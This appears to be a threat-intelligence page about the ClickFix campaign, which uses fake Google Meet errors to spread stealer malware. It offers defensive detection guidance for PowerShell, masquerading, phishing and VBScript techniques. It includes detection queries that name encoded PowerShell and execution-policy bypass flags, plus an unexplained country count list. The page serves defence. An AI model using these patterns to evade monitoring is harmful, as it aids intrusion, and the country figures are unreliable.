Campaigns
ClickFix Campaign: Fake Google Meet Alerts Spread Malware Across Windows and macOS

ClickFix Campaign: Fake Google Meet Alerts Spread Malware Across Windows and macOS

ClickFixFake Google Meet AlertsFake Error Messages
Cybercriminals are tricking users with fake Google Meet error messages, prompting them to download files laced with malware. This campaign, employing the ClickFix tactic, targets both Windows and macOS users, aiming to infiltrate systems with information-stealing malware. The technique has increasingly been used to bypass security measures and exploit system vulnerabilities.

Indicators of Compromise

No domains found for this campaign

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION

T1059.001 Command and Scripting Interpreter: PowerShell


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). [273] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[274] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.

PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe

For this to work, certain registry keys must be set, and the WinRM service must be enabled. The PowerShell command Enter-PSSession -ComputerName \<RemoteHost> creates a remote PowerShell session.

DS0011

Module

Module Load

Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).[3][4]

Analytic 1 - Processes loading PowerShell assemblies

source="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="7" | where ModulePath LIKE "%system.management.automation%" OR FileDescription LIKE "%system.management.automation%"

DS0009

Process

Process Creation

Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution. PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.

Powershell can be used to hide monitored command line execution such as:

net usesc start

Note: - The logic for Analytic 1 is based around detecting on non-interactive Powershell sessions (i.e., those not launched by a user through explorer.exe). This may lead to false positives when used in a production environment, so we recommend tuning any such analytics by including additional logic (e.g., looking for suspicious parent processes) that helps filter such events.- The logic for Analytic 2 is based around detecting on remote Powershell sessions. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe.

Analytic 1 - Non-interactive Powershell Sessions

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="powershell.exe" AND ParentImage!="explorer.exe"

Analytic 2 - Remote Powershell Sessions

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="wsmprovhost.exe" AND ParentImage="svchost.exe"

Analytic 3 - Powershell Execution

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") Image="C:\Windows\\powershell.exe" ParentImage!="C:\Windows\explorer.exe"|stats values(CommandLine) as "Command Lines" values(ParentImage) as "Parent Images" by ComputerName



Process Metadata

Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[275]

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Script Block Logging Events

(source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4104" AND Image="powershell.exe" AND (CommandLine="-enc" OR CommandLine="-ep bypass" OR CommandLine="-noni*")


T1036 - Masquerading


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. [52]

Note: For Windows, Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on potential Masquerading.

DS0022

File

File Metadata

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE".

Check and ensure that file headers/signature and extensions match using magic bytes detection and/or file signature validation.[53] In Linux, the file command may be used to check the file signature.[54]



File Modification

Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted file accesses that may be associate with Masquerading.

DS0007

Image

Image Metadata

Collecting disk and resource filenames for binaries, comparing that the InternalName, OriginalFilename, and/or ProductName match what is expected, could provide useful leads but may not always be indicative of malicious activity. [55]

DS0009

Process

OS API Execution

Monitor for API calls such as fork() which can be abused to masquerade or manipulate process metadata.



Process Creation

Monitor for newly executed processes that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. The RECYCLER and SystemVolumeInformation directories will be present on every drive. Replace %systemroot% and %windir% with the actual paths as configured by the endpoints.

Analytic 1 - Suspicious Run Locations

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") AND ( Image=":\RECYCLER*" OR Image=":\SystemVolumeInformation*" OR Image="%windir%\Tasks*" OR Image="%systemroot%\debug*")



Process Metadata

Monitor for file names that are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled.

DS0003

Scheduled Job

Scheduled Job Metadata

Monitor for contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.

On Windows, Event ID 4698 (Security Log - A scheduled task was created) can be used to alert on the creation of scheduled tasks and provides metadata including the task name and task content (as XML).

On Linux, auditing frameworks such as the Linux Auditing System (auditd) can be used to alert on invocations of cron, and provides the metadata included when executing the command.



Scheduled Job Modification

Monitor for changes made to scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

DS0019

Service

Service Creation

Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.



Service Metadata

Monitor for contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.


T1566.002 Spear Phishing Link


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[124][125] URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can help detect links leading to known malicious sites.[2] Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.

Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Furthermore, monitor network traffic for cloned sites as well as homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1566.001 - Spearphishing Attachment


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[255][256] Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.[257]

DS0022

File

File Creation

Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[255][256]



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1189 - Drive-by Compromise


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.

DS0022

File

File Creation

Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.



Network Traffic Content

Monitor for other unusual network traffic that may indicate additional tools transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.

DS0009

Process

Process Creation

Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, or evidence of Discovery.


T1204 - User Execution


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Monitor for third-party application logging, messaging, and/or other artifacts that may rely upon specific actions by a user in order to gain execution.

DS0017

Command

Command Execution

Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.

DS0032

Container

Container Creation

Monitor for newly constructed containers that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.



Container Start

Monitor for the activation or invocation of a container (ex: docker start or docker restart)

DS0022

File

File Creation

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

DS0007

Image

Image Creation

Monitor for newly constructed image that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

DS0030

Instance

Instance Creation

Monitor for newly constructed instances that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.



Instance Start

Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs)

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).



Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious detinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).

DS0009

Process

Process Creation

Monitor for newly executed processes that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.


T1059.005 - Visual Basic


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution.

DS0011

Module

Module Load

Monitor for the loading of modules associated with VB languages (ex: vbscript.dll).

Note: For Windows, Sysmon Event ID 7 (Image loaded) can be used to alert on the loading of DLL modules (e.g., vbscript.dll) associated with Visual Basic into processes. Due to the high frequency of image load operations, Event ID 7 can generate a large volume of events. Therefore, we recommend tuning the Sysmon configuration file to exclude common, benign image loads that may result in false positives.

DS0009

Process

Process Creation

Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Note: Be aware of VBScript execution from temporary or unusual file locations, which may indicate malicious activity.

Analytic 1 - Script Execution from Temporary Locations

(source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4103") | WHERE CommandLine LIKE "AppData.vbs" OR CommandLine LIKE "AppData.vbe" OR CommandLine LIKE "AppData.vba"

Observed Countries250

AD (852)
AE (847)
AF (241)
AG (673)
AI (373)
AL (855)
AM (797)
AO (579)
AQ (695)
AR (91)
AS (860)
AT (82)
AU (570)
AW (698)
AX (978)
AZ (562)
BA (944)
BB (423)
BD (705)
BE (49)
BF (705)
BG (683)
BH (261)
BI (7)
BJ (797)
BL (164)
BM (927)
BN (733)
BO (850)
BQ (338)
BR (620)
BS (793)
BT (173)
BV (6)
BW (854)
BY (577)
BZ (637)
CA (998)
CC (461)
CD (139)
CF (301)
CG (416)
CH (82)
CI (679)
CK (933)
CL (618)
CM (128)
CN (631)
CO (725)
CR (799)
CU (130)
CV (559)
CW (784)
CX (533)
CY (463)
CZ (501)
DE (479)
DJ (961)
DK (497)
DM (772)
DO (308)
DZ (753)
EC (268)
EE (573)
EG (47)
EH (795)
ER (531)
ES (81)
ET (801)
FI (478)
FJ (398)
FK (903)
FM (363)
FO (496)
FR (188)
GA (372)
GB (620)
GD (221)
GE (855)
GF (706)
GG (486)
GH (410)
GI (3)
GL (140)
GM (448)
GN (957)
GP (876)
GQ (157)
GR (484)
GS (72)
GT (369)
GU (801)
GW (755)
GY (587)
HK (249)
HM (246)
HN (586)
HR (651)
HT (606)
HU (393)
ID (825)
IE (935)
IL (580)
IM (119)
IN (497)
IO (871)
IQ (868)
IR (9)
IS (858)
IT (564)
JE (456)
JM (96)
JO (774)
JP (356)
KE (536)
KG (250)
KH (7)
KI (25)
KM (649)
KN (770)
KP (646)
KR (348)
KW (178)
KY (218)
KZ (213)
LA (972)
LB (992)
LC (94)
LI (907)
LK (753)
LR (944)
LS (722)
LT (144)
LU (105)
LV (561)
LY (273)
MA (222)
MC (917)
MD (933)
ME (883)
MF (212)
MG (433)
MH (952)
MK (480)
ML (79)
MM (367)
MN (679)
MO (194)
MP (103)
MQ (670)
MR (750)
MS (516)
MT (375)
MU (435)
MV (195)
MW (77)
MX (392)
MY (405)
MZ (53)
NA (958)
NC (928)
NE (974)
NF (591)
NG (805)
NI (105)
NL (54)
NO (831)
NP (846)
NR (90)
NU (625)
NZ (865)
OM (25)
PA (463)
PE (523)
PF (225)
PG (500)
PH (4)
PK (295)
PL (953)
PM (427)
PN (262)
PR (310)
PS (352)
PT (181)
PW (663)
PY (550)
QA (622)
RE (659)
RO (510)
RS (318)
RU (155)
RW (764)
SA (267)
SB (114)
SC (256)
SD (477)
SE (86)
SG (1)
SH (385)
SI (375)
SJ (568)
SK (785)
SL (191)
SM (779)
SN (56)
SO (600)
SR (618)
SS (219)
ST (782)
SV (328)
SX (789)
SY (152)
SZ (104)
TC (258)
TD (747)
TF (611)
TG (440)
TH (592)
TJ (987)
TK (30)
TL (851)
TM (507)
TN (601)
TO (559)
TR (915)
TT (548)
TV (446)
TW (584)
TZ (124)
UA (524)
UG (151)
UM (14)
US (697)
UY (26)
UZ (520)
VA (651)
VC (705)
VE (221)
VG (54)
VI (434)
VN (5)
VU (943)
WF (231)
WS (443)
XK (723)
YE (871)
YT (58)
ZA (870)
ZM (963)
ZW (251)